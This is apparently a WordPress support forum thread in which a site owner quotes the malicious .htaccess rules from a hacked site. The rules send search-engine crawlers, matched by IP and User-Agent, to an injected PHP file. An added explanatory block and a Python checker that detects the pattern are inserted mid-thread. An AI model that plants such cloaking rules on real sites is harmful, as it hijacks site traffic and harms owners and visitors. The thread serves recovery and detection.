WordPress.org


[closed] backdoor trojan in PHP (2 posts)

  1. paulbanks05
    Member
    Posted 4 years ago #

    So after going through almost all of the steps listed here-

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    I'm still showing a malware re-direct on my WP built site. It doesn't show up all the time, just enough to be recurring enough to decimate my traffic, and a re-direct to mainnetsoll.com after a clean install of WP, and removal of the infected .htaccess file, which looked like this:

    RewriteEngine on
    RewriteBase /
    RewriteCond %{HTTP_HOST} (^|www.)thesportsbank.net
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot|[Ss]lurp)
    RewriteRule ^(.*)$ core/wp-admin/includes/media.class.php [L]

    These files were also infected
    wp-admin\includes\media.class.php
    wp-content\themes\classic\functions.php
    wp-includes\js\tinymce\plugins\spellchecker\classes\utils\utils.php

    Here's a description of the original attack:
    http://www.derekfountain.org/security_c99madshell.php

    It may have been on the back-end, as I was one of those WP blogs brought down on Network Solutions server on Sun. detailed here

    http://wordpress.org/development/2010/04/file-permissions/

    Luckily, I purchased a new hosting package on another more secure host, and with the help of my regular programmer moved everything over this weekend.

    I have a couple very experienced and extremely knowledgeable people on this right now, but not full time and I'm genuinely worried that this problem may be extremely severe, and may require someone who could devote more time to it.

    Because we keep removing the malicious code, and yet the re-direct keeps coming back. I can provide a copy of the bad code if needs be, to help speed along the recovery process, but I may need to hire another, very advanced php programmer, know anyone? I want to get this fixed ASAP and will spend the money to do so for someone who can attack it full time.

    my email paulb05@hotmail.com
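
The rules quoted in the post above send only search-engine crawlers (matched by client IP or User-Agent) to a PHP file other than WordPress's own index.php, which is why the owner rarely sees the redirect. The following is an added example, not part of the original post: a small checker that flags that pattern in an .htaccess file. The function name, the sample hostname-free rule sets and the heuristic itself are assumptions made for illustration.

```python
import re

# Crawler names taken from the User-Agent condition quoted in the post.
CRAWLER_UA = re.compile(r"google|msnbot|slurp", re.I)

def scan_htaccess(text):
    # Flag RewriteRules gated on visitor identity that serve an unusual target.
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        kind = parts[0].lower()
        if kind == "rewritecond":
            conds.append((parts[1].strip("%{}"), parts[2]))
        elif kind == "rewriterule":
            target = parts[2]
            reasons = []
            for var, pattern in conds:
                if var == "HTTP_USER_AGENT" and CRAWLER_UA.search(pattern):
                    reasons.append("crawler User-Agent match")
                elif var == "REMOTE_ADDR":
                    reasons.append("client IP match " + pattern)
            # Stock WordPress rewrites only to /index.php; another PHP file or
            # an external URL behind a visitor-selective condition is suspect.
            odd_php = target.lower().endswith(".php") and not re.fullmatch(r"/?index\.php", target)
            odd_target = odd_php or bool(re.match(r"https?://", target))
            if reasons and odd_target:
                findings.append({"line": lineno, "target": target, "reasons": reasons})
            conds = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

# Constructed sample modelled on the rules quoted in the post (shortened).
SAMPLE_INFECTED = r"""
RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
RewriteCond %{HTTP_USER_AGENT} (google|msnbot|[Ss]lurp)
RewriteRule ^(.*)$ core/wp-admin/includes/media.class.php [L]
"""
# Stock WordPress rewrite block, which must not be flagged.
SAMPLE_CLEAN = r"""
RewriteEngine On
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

if __name__ == "__main__":
    print(scan_htaccess(SAMPLE_INFECTED))
```

Because the redirect in this thread kept coming back after cleanup, a check like this is most useful when run on a schedule against every .htaccess file under the web root, not once.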

  2. esmi
    Theme Diva & Forum Moderator
    Posted 4 years ago #

Topic Closed

This topic has been closed to new replies.
